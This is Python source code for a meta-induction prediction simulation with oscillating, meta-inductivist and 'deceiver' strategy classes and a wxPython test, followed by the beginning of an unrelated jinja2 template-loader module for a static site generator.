# Oscillator
#
########################################################################
OSC_UP = "up"
OSC_DOWN = "down"
OSC_WAITTOP = "waitTop"
OSC_WAITBOTTOM = "waitBottom"
class Oscillator(Predictor):
"""Abstract base class for all oscillator classess.
Attributes:
phase - tells whether this oscillator is presently
going up or down; can take the value of one
of the above defined constants
"""
def __init__(self, name):
Predictor.__init__(self, name)
self.phase = OSC_UP
def predict(self):
if self.phase == OSC_UP: self.prediction = self.world.event
else: self.prediction = invertEvent(self.world.event)
return self.prediction
def analyse(self):
raise NotImplementedError
class AmplitudeOscillator(Oscillator):
"""Success oscillates between predefined rates.
Attributes:
min - minimal success rate value
max - maximal success rate value
"""
def __init__(self, minv, maxv, name = "Amplitude Oscillator"):
"""Succes rate oscillates between min and max."""
Oscillator.__init__(self, name + " %.2f, %.2f" % (minv, maxv))
if minv > maxv:
x = maxv; maxv = minv; minv = x
self.min = minv
self.max = maxv
def analyse(self):
if self.successRate > self.max: self.phase = OSC_DOWN
elif self.successRate < self.min: self.phase = OSC_UP
class PeriodOscillator(Oscillator):
"""An oscillator with a fixed period but (necessarily)
diminishing amplitude.
Attributes:
halfperiod - half the period length in rounds
shift - phase shift in rounds
"""
def __init__(self, halfperiod, shift, name = "Period Oscillator"):
Oscillator.__init__(self, name)
self.name = name + " " + str(halfperiod) + " " + str(shift)
self.halfperiod = halfperiod
self.shift = shift % (2*halfperiod)
if self.shift >= halfperiod: self.phase = OSC_DOWN
else: self.phase = OSC_UP
def analyse(self):
s = (self.world.round+self.shift) % (2*self.halfperiod)
if s >= self.halfperiod: self.phase = OSC_DOWN
else: self.phase = OSC_UP
class CoupledOscillator(AmplitudeOscillator):
"""Oscillator that is connected to another oscillator of the
same kind, but opposite phase.
Attributes:
combo - the other oscillator that this one is
combined with
"""
def __init__(self, min, max, name = "Coupled Oscillator"):
AmplitudeOscillator.__init__(self, min, max, name)
self.combo = None
def registeredBy(self, world):
AmplitudeOscillator.registeredBy(self, world)
for predictor in self.world.non_miList:
if isinstance(predictor, CoupledOscillator) and \
predictor != self:
self.combo = predictor
self.combo.combo = self
if self.phase == self.combo.phase:
if self.phase == OSC_UP: self.phase = OSC_DOWN
else: self.phase = OSC_UP
break
def predict(self):
if self.phase == OSC_UP:
self.prediction = self.world.event
elif self.phase == OSC_DOWN:
self.prediction = invertEvent(self.world.event)
elif self.phase == OSC_WAITTOP:
if randomBool(self.max): self.prediction=self.world.event
else: self.prediction = invertEvent(self.world.event)
else: # self.phase == "waitBottom"
if randomBool(self.min): self.prediction=self.world.event
else: self.prediction = invertEvent(self.world.event)
return self.prediction
def analyse(self):
if self.phase == OSC_UP and self.successRate > self.max:
self.phase = OSC_WAITTOP
elif self.phase == OSC_DOWN and self.successRate < self.min:
self.phase = OSC_WAITBOTTOM
if self.phase == OSC_WAITTOP:
if self.combo.phase != OSC_DOWN: self.phase = OSC_DOWN #else do nothing
elif self.phase == OSC_WAITBOTTOM:
if self.combo.phase != OSC_UP: self.phase = OSC_UP
class OscDelayedForecaster(Forecaster, AmplitudeOscillator):
"""Forecaster that acts like an Amplitude Oscillator
in the beginning (for a given number of phases), before
it acts like a Forecaster.
Attributes:
phaseLimit - the number of half phase changes until
its behavior changes from an amplitude oscillator
to a Forecaster
phaseCounter - the actual number of half phase chagnes
oscState - the state (up or down) of the current
phase
Note: the parameter maxPhase of the constructor __init__
take the number of full phases, while the object variables
phaseLimit and phaseCounter use half phases!
"""
def __init__(self, minv, maxv, maxPhases, successAim,
name = "OscDelayedForecaster"):
Forecaster.__init__(self, successAim, name)
AmplitudeOscillator.__init__(self, minv, maxv, name)
self.phaseLimit = maxPhases*2
self.phaseCounter = 0
self.oscState = self.phase
def predict(self):
if self.phaseCounter < self.phaseLimit:
return AmplitudeOscillator.predict(self)
else: return Forecaster.predict(self)
def analyse(self):
if self.phaseCounter < self.phaseLimit:
AmplitudeOscillator.analyse(self)
else: Forecaster.analyse(self)
if self.oscState != self.phase:
self.phaseCounter += 1
self.oscState = self.phase
########################################################################
#
# Meta-Inductivists
#
########################################################################
class MetaInductivist(Predictor):
"""Follow the most successful strategy so far.
Attributes:
fav - the current favorite of the meta inductivist
"""
def __init__(self, name = "Meta Inductivist"):
Predictor.__init__(self, name)
self.fav = None
def registeredBy(self, world):
Predictor.registeredBy(self, world)
self.fav = None
def predict(self):
if self.fav:
self.prediction = self.fav.prediction
elif self.world.round == 1 and not(self.world.worldDeceived == self):
for p in self.world.non_miList:
if isinstance(p, ObjectInductivist):
self.prediction = p.prediction
break
else:
self.prediction = getRandomEvent()
else:
if self.world.worldDeceived == self:
self.prediction = invertEvent(self.world.event)
else:
self.prediction = getRandomEvent()
return self.prediction
# self.world.non_miList = Liste aller predictors, die keine MIs sind
# bestof(Liste) gibt Liste der besten Strategien zurück.
# (Liste) wählt Element der Liste der Gleichguten aus
# einzuführen: alphchoice, randchoice
def analyse(self):
best = choice(bestOf(self.world.non_miList))
if self.fav == None or \
best.successRate > self.fav.successRate: self.fav = best
class EpsilonMetaInductivist(MetaInductivist):
"""Meta inductivist that picks a new strategy only
if it is more than a little bit better than its old favorite.
"""
def __init__(self, name="Epsilon Meta Inductivist"):
MetaInductivist.__init__(self, name)
# "%.3f" gibt Format der Zahl nach dem % an. .3Fliesskomma
def analyse(self):
candidate = choice(bestOf(self.world.non_miList))
if self.fav == None or \
candidate.successRate > self.fav.successRate + epsilon:
self.fav = candidate
###################################################################
#### Diese Klasse wird nur für lokale Deception-Detection benötigt,
#### bei local Avoidance MI
####################################################################
class DeceptionDetectionMixin(MetaInductivist):
"""A Mixin class that implements the local "deceived"-function.
Attributes:
control - a dictionary of [a,b] indexed by the
Non-MI Strategies (possibly deceivers) that records the number
of times this MI has put each one of them (a) as well as the
number of successes this MI had when putting on a certain
strategy (b).
"""
def __init__(self):
self.control = {}
def _registered(self):
for p in self.world.non_miList:
self.control[p.name] = [0, 0]
# Lokale deception detection; für jeden MI einzeln; diese Klasse abgeleitet von MI
#verwendet nur der bisherige avoidanceMI
# höchstens relevant für die Zukunft
def succ(self, a):
"""Return the relative success of 'a' while MI has put on 'a'."""
n, absucc = self.control[a.name]
if n == 0: return 0.0
else: return float(absucc) / float(n)
def nsucc(self, a):
"""Return the relative success of 'a' while MI has not put on 'a'."""
n, absucc = self.control[a.name]
if self.world.round == n: return 0.0
else: return float(a.success - absucc) / float(self.world.round - n)
def deceived(self, a):
"""return True if MI seems to have been deceived by 'a'.
"""
try:
n = self.control[a.name][0]
if hardrule:
return self.nsucc(a) > self.succ(a) + epsilonD and \
(n > 5) and ((self.world.round - n) > 5)
else:
return (n > 5) and ( (a.successRate > self.succ(a) + epsilonD) or \
(a.successRate < epsilonD))
except KeyError:
raise AssertionError, str(a) + " is not a non-MI!"
def future_deceiveddown(self, a):
"""return True if MI seems to have been deceived by 'a', if
a cheats in the next round.
"""
nfav, succfav = self.control[a.name]
#f_n = n+1;
# f_worldround = self.world.round+1
f_successRate = float(a.success) / float(self.world.round+1)
f_successRatefav = float(succfav) / float(nfav+1)
if hardrule:
return self.nsucc(a) > (f_successRatefav + epsilonD) and \
(nfav+1 > 5) and ((self.world.round - nfav) > 5)
else:
return nfav+1 > 5 and (f_successRate > f_successRatefav + epsilonD \
or f_successRate < epsilonD)
def future_deceivedup(self, a):
"""return True if MI seems to have been deceived by 'a', if
a cheats in the next round.
"""
nfav, succfav = self.control[a.name]
#f_n = n+1;
# f_worldround = self.world.round+1
f_successRate = float(a.success +1) / float(self.world.round+1)
if hardrule:
return (nfav+1 > 5) and ((self.world.round - nfav) > 5) and \
float(a.success+1-succfav)/(self.world.round+1 - nfav) > \
(float(succfav)/nfav) + epsilonD
else:
return nfav > 5 and (f_successRate > (float(succfav)/nfav) + epsilonD \
or f_successRate < epsilonD)
def _analyse(self):
if self.fav in self.world.non_miList:
self.control[self.fav.name][0] += 1
if self.fav.prediction == self.world.event:
self.control[self.fav.name][1] += 1
## def predict(self):
## if self.world.randomGuessFlag:
## if deceivedOI:
## self.prediction = invertEvent(self.world.event)
## else:
## self.prediction = getRandomEvent(p = 0.5)
## else:
## self.prediction = self.fav.prediction
## return self.prediction
#####################################
### Avoidance MIs ###
#####################################
class LocAvoidMI(EpsilonMetaInductivist, DeceptionDetectionMixin):
def __init__(self, name="LocAvoidMI"):
DeceptionDetectionMixin.__init__(self)
EpsilonMetaInductivist.__init__(self, name)
def registeredBy(self, world):
EpsilonMetaInductivist.registeredBy(self, world)
# DeceptionDetectionMixin._registered(self)
def predict(self):
if self.world.round == 1:
DeceptionDetectionMixin._registered(self)
return EpsilonMetaInductivist.predict(self)
def analyse(self):
DeceptionDetectionMixin._analyse(self)
if (self.world.round % 100) < 5:
#gibt alle 100 Runden neue Chance 5 mal
#Achtung bringt nichts für alle denn der aMI
#geht ja nur auf den besten
candidate = choice(bestOf(self.world.non_miList))
if self.fav == None \
or candidate.successRate > self.fav.successRate + epsilon:
self.fav = candidate
return
agList = self.world.non_miList[:]
while agList != []:
F = choice(bestOf(agList))
if self.deceived(F): agList.remove(F)
else: break
if agList != []:
if self.fav not in agList or \
(F.successRate > self.fav.successRate + epsilon):
self.fav = F
else: self.fav = None
# Änderungen:
# deception Recording erst nach n=5 Runden...
# SoftDecRec: | Succ(Ai,n) - Succ(Ai,n | MIj puts on Ai) |> epsilon
# gibt dem Ai immer wieder eine Chance, weil die Anzahl von Runden von MIj auf Ai setzt,
# verschwindend gering wird im Vgl. zu den Runden, wo das nicht der Fall ist, und daher im
# Quotient untergeht
# HardDecRec: | Succ(Ai,n | nicht MIj puts on Ai) - Succ(Ai,n | MIj puts on Ai)|> epsilon
class AvoidMI(EpsilonMetaInductivist):
def __init__(self, name="AvoidMI"):
EpsilonMetaInductivist.__init__(self, name)
def registeredBy(self, world):
EpsilonMetaInductivist.registeredBy(self, world)
def analyse(self):
#spielt wie PunishMIColl wenn nicht neutralizing
#ausser gibt imemr wieder neue Chance
if (self.world.round % 100) < 0:
candidate = choice(bestOf(self.world.non_miList))
if self.fav == None \
or candidate.successRate > self.fav.successRate + epsilon:
self.fav = candidate
return
if self.world.nondeceivers != []:
bestAg = choice(bestOf(self.world.nondeceivers))
if self.fav not in self.world.nondeceivers:
self.fav = bestAg
elif bestAg.successRate > (self.fav.successRate + epsilon):
self.fav = bestAg
else: True
else:
self.fav = None
class UltAvoidMI(EpsilonMetaInductivist):
def __init__(self, name="AvoidMI"):
EpsilonMetaInductivist.__init__(self, name)
def registeredBy(self, world):
EpsilonMetaInductivist.registeredBy(self, world)
def analyse(self):
#spielt wie PunishMIColl wenn nicht neutralizing
#ausser gibt imemr wieder neue Chance
if (self.world.round % 100) < 0:
candidate = choice(bestOf(self.world.non_miList))
if self.fav == None \
or candidate.successRate > self.fav.successRate + epsilon:
self.fav = candidate
return
if self.world.nonalldeceivers != []:
bestAg = choice(bestOf(self.world.nonalldeceivers))
if self.fav not in self.world.nonalldeceivers:
self.fav = bestAg
elif bestAg.successRate > (self.fav.successRate + epsilon):
self.fav = bestAg
else: True
else:
self.fav = None
###################################################################
### class MIcoll
## Die Überklasse der kollektiv organisierten MIs Nummerieren sich.
#####################################################################
class CollectiveMI(EpsilonMetaInductivist):
"""Abstract base class for collective meta inductivist strategies.
Collective meta inductivists are prediction strategies that work
together as a corrdinated group.
Attributes:
order - the order number of the meta inductivist, e.g.
if this MI is MI3 then order will be 3
cmiList - a list of the other collective meta inductivists
(of the same class) in the world with a lower order
"""
def __init__(self, name = "Collective Meta Inductivist"):
EpsilonMetaInductivist.__init__(self, name)
self.order = 1
self.cmiList = []
def registeredBy(self, world):
for p in world.miList:
if isinstance(p, self.__class__) and p != self:
self.order += 1
self.cmiList.append(p)
# self.name = self.name + " " + str(self.order)
EpsilonMetaInductivist.registeredBy(self, world)
def analyse(self):
raise NotImplementedError
###################################################################
####### Die invertierten MIColls, die negativ auf andere MIs setzen können
#####################################################################
class InvertMIColl(CollectiveMI):
"""This meta inductivist uses other meta inductivists with small success as a
negatively correlated source for his own predictions.
Attributes:
invert - boolean flag that indicates whether this meta
inductivist puts negatively or positively
on its favorite
"""
def __init__(self, name = "InvertMIColl"):
CollectiveMI.__init__(self, name)
self.invert = False
def predict(self):
if self.fav:
if self.invert:
self.prediction = invertEvent(self.fav.prediction)
else: self.prediction = self.fav.prediction
else: # nur in erster Runde kein fav
if self.world.worldDeceived == self:
self.prediction = invertEvent(self.world.event)
else:
self.prediction = getRandomEvent(0.5)
return self.prediction
def analyse(self):
if self.order == 1:
EpsilonMetaInductivist.analyse(self)
else:
best_nonMI = choice(bestOf(self.world.non_miList))
worstMI = choice(worstOf(self.cmiList))
if best_nonMI.successRate >= 1.0 - worstMI.successRate + epsilon:
self.fav = best_nonMI
self.invert = False
else:
#self.fav = worstMI
self.fav = worstMI.fav
# self.invert = not worstMI.invert
self.invert = True
###############################################################
###### Die neutralisierenden MIColls - statt "neutralisierend" steht noch
####### "punish" -- mit deception detection.
###################################################################
class PunishMIColl(CollectiveMI):#, DeceptionDetectionMixin):
"""A collective defense which uses global deception dection to
protect itself. The MIs "punish" the decivers, or better neutralize
them, by putting on the deceivers in a 1:1 manner as long as they deceiver.
The MIs not needed for neutralization/punishment act like ordinary eMIs.
"""
def __init__(self, name="Punish"):
# DeceptionDetectionMixin.__init__(self)
CollectiveMI.__init__(self, name)
def registeredBy(self, world):
CollectiveMI.registeredBy(self, world)
# DeceptionDetectionMixin._registered(self)
# MetaInductivist.registeredBy(self, world)
def analyse(self):
if self.world.round < 10:
candidate = choice(bestOf(self.world.non_miList))
if not self.fav or \
candidate.successRate > self.fav.successRate + epsilon:
self.fav = candidate
return
if self.order <= len(self.world.deceivers):
self.fav = self.world.deceivers[self.order-1]
#Elementindizierung beginnt mit Null
else:
if self.world.nondeceivers != []:
bestAg = choice(bestOf(self.world.nondeceivers))
if self.fav not in self.world.nondeceivers:
self.fav = bestAg
elif bestAg.successRate > (self.fav.successRate + epsilon):
self.fav = bestAg
else: True
else:
self.fav = None
class UltPunishMIColl(PunishMIColl):
"""Like PunishMIColl, but if a deceiver has changed his deception status by
at least three times, he will be recorded as a deceiver forever (he is then
a so-called ultimate deceiver).
"""
def __init__(self, name = "UltPunishMIColl"):
PunishMIColl.__init__(self, name)
def analyse(self):
if self.world.round < 10:
candidate = choice(bestOf(self.world.non_miList))
if not self.fav \
or candidate.successRate > self.fav.successRate + epsilon:
self.fav = candidate
return
if self.order <= len(self.world.alldeceivers):
self.fav = self.world.alldeceivers[self.order-1]
#Elementindizierung beginnt mit Null
else:
if self.world.nonalldeceivers != []:
bestAg = choice(bestOf(self.world.nonalldeceivers))
if self.fav not in self.world.nonalldeceivers:
self.fav = bestAg
elif bestAg.successRate > (self.fav.successRate + epsilon):
self.fav = bestAg
else: True
else:
self.fav = None
#################################################################
### Collective Weighted Average Meta-Inductivist.
### Die MIs dieser Sorte haben keinen Favoriten mehr.
### Daher muss auch spezielle predict-Funktion definiert werden.
##################################################################
class WeightAv(Predictor):
def __init__(self, name="WeightAv"):
Predictor.__init__(self, name)
self.idealabsucc = 0.0
self.idealsuccessRate = 0.0
self.attDict = {}
self.idealprediction = 0.5
def registeredBy(self, world):
Predictor.registeredBy(self, world)
# MetaInductivist.registeredBy(self, world)
# def order(self, p):
# return self.world.non_miList.index(p)
# createAttDict ist eine Funktion (ohne Parameter), zu unterscheiden vom
# Wert der Funktion attDict
def createAttDict(self):
self.attDict = {}
self.idealabsucc += (1 - abs(self.world.event - self.idealprediction ))
self.idealsuccessRate = (self.idealabsucc/self.world.round)
for p in self.world.non_miList:
order = self.world.non_miList.index(p)
value = p.successRate - self.idealsuccessRate
# self.attDict['p.name'] = value
self.attDict[order] = value
return self.attDict
def idealpred(self):
if self.world.miList.index(self) > 0:
self.idealprediction = self.world.miList[0].idealprediction
return self.idealprediction
#für WeightAvMIColl order>1 nicht neu berechnet
if self.world.round <= 1:
idealprediction = 0.5
else:
Denum = 0.0
Nom = 0.0
for p in self.world.non_miList:
# order = self.order(p)
order = self.world.non_miList.index(p)
if self.attDict[order] > 0:
# Nom = Nom + self.attDict[p.name]
Nom = Nom + self.attDict[order]
if p.prediction == 1:
Denum = Denum + self.attDict[order]
# Denum = Denum + self.attDict[p.name]
if Nom == 0:
idealprediction = 0.5
else:
idealprediction = (Denum/Nom)
self.idealprediction = idealprediction
return self.idealprediction
def analyse(self):
if self.world.miList.index(self) == 0:
self.createAttDict()
else:
self.attDict = self.world.miList[0].attDict
# berechnet attDict nur einmal, beim ersten WeightAvMIColl
class WeightAvMIColl(WeightAv, CollectiveMI):
def __init__(self, name="WeightAvMIColl"):
WeightAv.__init__(self, name)
CollectiveMI.__init__(self, name)
def registeredBy(self, world):
WeightAv.registeredBy(self, world)
CollectiveMI.registeredBy(self, world)
# MetaInductivist.registeredBy(self, world)
def predict(self):
idealprediction = self.idealpred()
miNumber = len(self.world.miList)
miPosNumber = round(miNumber * idealprediction)
order = self.world.miList.index(self)
# if order == 0: print idealprediction
if (order + 1) <= (miNumber - miPosNumber):
self.prediction = 0
else:
self.prediction = 1
return self.prediction
########################################################################
#
# Deceivers
#
########################################################################
AG_SUCCEED = "succeed"
AG_FAIL = "fail"
class Deceiver(Predictor):
"""Abstract base class for all deceivers. Deceiverss are predictors that
try to lead meta inductivists into failure by predicting
badly when they are favorites.
Attributes:
state - indicates whether this deceiver will make succeeding
or failing predictions; can take the value of one
of the above defined constants: AG_XX
"""
def __init__(self, name = "Deceiver"):
Predictor.__init__(self, name)
self.state = AG_SUCCEED
def predict(self):
if self.state == AG_SUCCEED: self.prediction = self.world.event
else: self.prediction = invertEvent(self.world.event)
return self.prediction
def analyse(self):
raise NotImplementedError
class SystOscillator(Deceiver):
"""This forecaster is not a proper deceiver, but acts similar to a deceiver.
It tries to get ahead of all other strategies and then
conciously falls back in order to lead a meta-inductivist astray.
It oscillates systematically independent of which other
on-MI-players are present."""
def __init__(self, name="Systematic Oscillator"):
Deceiver.__init__(self, name)
self.miFav = None
def registeredBy(self, world):
Deceiver.registeredBy(self, world)
self.miFav = None
def predict(self):
return Deceiver.predict(self)
def analyse(self):
best = choice(bestOf(self.world.non_miList))
if not self.miFav or \
best.successRate > self.miFav.successRate: self.miFav = best
if self.miFav == self: self.state = AG_FAIL
else: self.state = AG_SUCCEED
class Spy(Deceiver): #Belassen bei 'Spy'. Ist der gewöhnlichste Deceiver
"""The spy checks the favorites of all meta inductivists.
If it is a favorite of at least one of them it keeps failing,
otherwise the spy will play perfect."""
def __init__(self, name = "Spy"):
Deceiver.__init__(self, name)
def analyse(self):
for mi in self.world.miList:
if mi.fav == self:
self.state = AG_FAIL
break
else:
self.state = AG_SUCCEED
class InvMIDeceiver(Deceiver):
"""A type of deceiver that issues a collective conspiracy against
a defense of InvertedMIColls."""
def __init__(self, name = "InvMIDeceiver"):
Deceiver.__init__(self, name)
def analyse(self):
p = 0; n = 0
for mi in self.world.miList:
if isinstance(mi, InvertMIColl):
if mi.fav == self:
if mi.invert: n += 1
else: p += 1
if p > n: self.state = AG_FAIL
else: self.state = AG_SUCCEED
# Diese Deceivers betrügen die WeightedAvMIColls
class AvDeceiver(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0.05:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver0(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver1(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0.1:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver2(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0.15:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver0Lim9(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0 or self.successRate > 0.9:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver0Lim8(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0 or self.successRate > 0.8:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver1Lim8(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0.1 or self.successRate > 0.8:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AvDeceiver1Lim9(Deceiver, WeightAv):
def __init__(self, name = "AvDeceiver"):
Deceiver.__init__(self, name)
WeightAv.__init__(self, name)
def analyse(self):
order = self.world.non_miList.index(self)
self.attDict = self.world.miList[0].attDict
if self.attDict[order] > 0.1 or self.successRate > 0.9:
self.state = AG_FAIL
else: self.state = AG_SUCCEED
class AntiPunishDeceiver(Deceiver):
"""A deceiver that tries to escape the punishing by reducing
deception rate as soon as recorded as deceiver.
Berücksichtigt nicht den ultDeceiver-Status; ist bezogen auf
den neutralizing/punishing MI"""
def __init__(self, name = "AntiPunishDeceiver"):
Deceiver.__init__(self, name)
# (lokale Variante)
# def analyse(self):
# for mi in self.world.miList:
# if (mi.fav == self) and not mi.deceived(self):
# self.state = AG_FAIL
# break
# else:
# self.state = AG_SUCCEED
def analyse(self):
for mi in self.world.miList:
if self in self.world.favlist and \
not self in self.world.deceivers:
self.state = AG_FAIL
break
else:
self.state = AG_SUCCEED
"""Hinweis: führt dazu, dass Anti-Punisher schnell deception
status wechselt, bald als ultdeceiver eingestuft wird und dann
nur mehr richtig voraussagt. Passiert auch denn, wenn es mehr Anti-Punishers als
neutMIs gibt, weil jeweils ein anderer als Favorit dient und deceiver
wird"""
class AntiUltPunDeceiver(Deceiver):
"""Berücktichtig den ultDeceiver Status. Sobald ultimate deceiver,
wird er dennoch ge-punished. Es wird wieder globale Variante benutzt.
"Führt dazu, dass Anti-Punisher schnell deception
status wechselt, bald als ultdeceiver eingestuft wird und dann
nur mehr richtig voraussagt. Passiert auch denn, wenn es mehr Anti-Punishers als
neutMIs gibt, weil jeweils ein anderer als Favorit dient und deceiver
wird"""
def __init__(self, name = "AntiPunishDeceiver"):
Deceiver.__init__(self, name)
def analyse(self):
for mi in self.world.miList:
if self in self.world.favlist and \
not self in self.world.alldeceivers:
self.state = AG_FAIL
break
else:
self.state = AG_SUCCEED
class AntiDeceiver(Deceiver):
"""A potential deceiver that avoids being recognized as a deceiver after
some rounds by calculating his future status w.r.t. MI.
Der Algorithmus ist auch bei mehreren MIs sinnvoll,
weil globale deception-Parameter, bezogen auf beliebige MIs, benutzt
werden.
Es handelt sich um keinen eigentlichen deceiver; dennoch muss er von der
deceiver-class abgeleitet werden"""
def __init__(self, name = "AntiDeceiver"):
Deceiver.__init__(self, name)
def analyse(self):
if (self.world.round <= 10):
self.state = AG_SUCCEED
return
future_favlist = [m.fav for m in self.world.miList]
if self in future_favlist:
if not self.world.future_deceiveddown(self):
self.state = AG_FAIL
# print "favnodown"
return
else:
self.state = AG_SUCCEED
# print "favdown"
return
else:
if not self.world.future_deceivedup(self):
self.state = AG_SUCCEED
# print "nofavnoup"
return
else:
self.state = AG_FAIL
# print "nofavup"
return
########################################################################
#
# Tests
#
########################################################################
def Simulation(title, predictorList, rounds = 500, visibleRange=(-1,-1),
winTitle = "Indcution Simulation",
eventFunction = lambda : getRandomEvent(2.0/3.0)):
win = wxGfx.Window(size=(800,600), title=winTitle)
graph = Graph.Cartesian(win, 0, 0.0, rounds, 1.0,
title, "Round", "Relative Success")
world = World(eventFunction)
penBox = Graph.PenGenerator()
for predictor in predictorList:
world.register(predictor)
pen = penBox.next()
pen.thickness = win.MEDIUM
graph.addPen(str(predictor), pen)
for n in range(1,rounds+1):
world.nextRound()
for predictor in world.getPredictorList():
graph.addValue(str(predictor), n, predictor.successRate)
if n % (rounds / 10) == 0: win.refresh()
if visibleRange[1] >= 0:
graph.adjustRange(visibleRange[0], 0.0, visibleRange[1], 1.0)
win.waitUntilClosed()
def TestSuite():
Simulation("Test 7",
[
Spy("A"),
Spy("A"),
Spy("A"),
Spy("A"),
Spy("A"),
UltPunishMIColl(name = "MI"),
PunishMIColl(name = "MI"),
PunishMIColl(name = "MI"),
PunishMIColl(name = "MI"),
PunishMIColl(name = "MI"),
PunishMIColl(name = "MI"),
])
if __name__ == "__main__":
import Gfx, wxGfx, Graph
from wxPython.wx import *
TestSuite()
```
|
{
"source": "jecki/SchnelleSeite",
"score": 2
}
|
#### File: jecki/SchnelleSeite/jinja2_loader.py
```python
import os
import time
import jinja2
import markdown
import sitetree
##############################################################################
#
# jinja2 environment filters
#
##############################################################################
def jinja2_current_date():
"""Returns the current date as YYYY-MM-DD."""
return time.strftime('%Y-%m-%d')
@jinja2.pass_environment
def jinja2_translate(env, expression):
"""Translates expression within the given jinja2 environment.
This requires that the variables 'local', 'language' and 'root' are
defined in the jinja2 environment.
"""
return sitetree.translate(expression, env.globals)
@jinja2.pass_environment
def jinja2_targetpage(env, target):
"""Returns the page basename (without ".html") of a link target.
E.g. "authors.html#Shakespeare" yields "authors"
"""
return (target.split("#")[0]).split(".")[0]
@jinja2.pass_environment
def jinja2_linktarget(env, target):
"""Makes sure that target is a proper link target."""
parts = target.split("#")
if parts[0] and not parts[0].endswith(".html"):
parts[0] += ".html"
return "#".join(parts)
@jinja2.pass_environment
def jinja2_getcontent(env, datasource):
"""Returns the content of a data source."""
return sitetree.getentry(env.globals['local'], datasource,
env.globals['language'])['content']
@jinja2.pass_environment
def jinja2_getmetadata(env, datasource, key):
"""Returns a particular item from the metadata of an entry."""
return sitetree.getentry(env.globals['local'], datasource,
env.globals['language'])['metadata'][key]
@jinja2.pass_environment
def jinja2_getitem(env, datasource, key):
"""Returns a paritcular item from a data source that is a dictionary."""
return sitetree.getitem(key, env.globals['local'], datasource,
env.globals['language'])
@jinja2.pass_environment
def jinja2_fragments(env, directory, orderby=None):
"""Returns a list of pathnames pathnames (starting from directory) of all
fragments in a directory.
Parameters:
directory(string): The directory from which the fragments shall be taken.
orderby(string): A metadata parameter which determines the order of
the fragments. Instead of supplying a function for this
parameter it may also be set in the metadata of the template
or in the "__config" file of the fragments directory. The orderby
parameter in the template metadata (if present) overrides the same
parameter in the fragment's directories' "__config" file. The
orderby argument passed to this function overrides all both.
"""
folder = env.globals['local'][directory]
order = orderby or env.globals.get('orderby') or \
env.globals['local'][directory].get('orderby')
return sitetree.collect_fragments(folder, directory, order)
@jinja2.pass_environment
def jinja2_multicast_pagename(env, subpage):
"""Returns the basename of the output page on which a particular subpage
appears.
"""
return env.globals['MC_PAGENAMES'][subpage]
def other_lang_URL(folder, basename, lang):
"""Returns a relative link from the file 'basename' in 'folder' to the
the same file in the language version 'lang'.
"""
path = []
while folder.parent:
path.append(folder.metadata['foldername'])
folder = folder.parent
path.append(lang)
path.extend(['..'] * len(path))
path.reverse()
path.append(basename + ".html")
return "/".join(path)
@jinja2.pass_environment
def jinja2_other_lang_URL(env, lang):
"""Returns the URL to a different language version of the current page.
"""
return other_lang_URL(env.globals['local'], env.globals['basename'], lang)
@jinja2.pass_environment
def jinja2_markdownify(env, text):
"""Runs 'text' through a markdown processor and returns the resultant
html.
"""
return markdown.markdown(text)
@jinja2.pass_environment
def jinja2_filepath_basename(env, filepath):
"""Returns the base name, i.e. the filename w/o path and extension, of
'filepath'. Note the semantics of this filter differ from
python's os.path.basename!.
"""
return os.path.splitext(os.path.basename(filepath))[0]
@jinja2.pass_environment
def jinja2_filepath_ext(env, filename):
"""Returns the extension of filename.
"""
return os.path.splitext(filename)[1]
@jinja2.pass_environment
def jinja2_split(env, s, ch):
"""Splits string 's' with character 'ch' as delimiter into a list of parts.
"""
return s.split(ch)
@jinja2.pass_environment
def jinja2_lower(env, s):
"""Converts string `s` to lowercase letters.
"""
return s.lower()
@jinja2.pass_environment
def jinja2_upper(env, s):
"""Converts string `s` to lowercase letters.
"""
return s.upper()
##############################################################################
#
# jinja2 loader
#
##############################################################################
class CustomJinja2Loader(jinja2.FileSystemLoader):
"""A custom jinja2 loader that returns the page templates and reads
further templates from the disk if requested.
Attributes:
data(string): The page template
"""
def __init__(self, data, template_paths):
paths = ["./"]
if template_paths:
paths.extend(template_paths)
jinja2.FileSystemLoader.__init__(self, paths)
self.data = data
def get_source(self, environment, template):
if template:
return jinja2.FileSystemLoader.get_source(self, environment,
template)
else:
return (self.data, "", lambda: True)
def jinja2_loader(text, metadata):
"""A loader for jinja2 templates.
"""
templ_paths = ""
if "config" in metadata and "template_paths" in metadata["config"]:
templ_paths = metadata["config"]["template_paths"]
env = jinja2.Environment(loader=CustomJinja2Loader(text, templ_paths))
env.globals.update(metadata)
# TODO: catch errors because of use of reserved keywords
env.globals['current_date'] = jinja2_current_date
